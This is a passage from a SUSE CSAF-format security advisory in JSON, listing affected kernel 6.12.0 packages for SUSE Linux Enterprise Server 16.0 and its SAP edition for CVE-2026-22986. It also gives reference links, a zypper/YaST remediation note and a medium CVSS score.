"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22986",
"url": "https://www.suse.com/security/cve/CVE-2026-22986"
},
{
"category": "external",
"summary": "SUSE Bug 1257276 for CVE-2026-22986",
"url": "https://bugzilla.suse.com/1257276"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
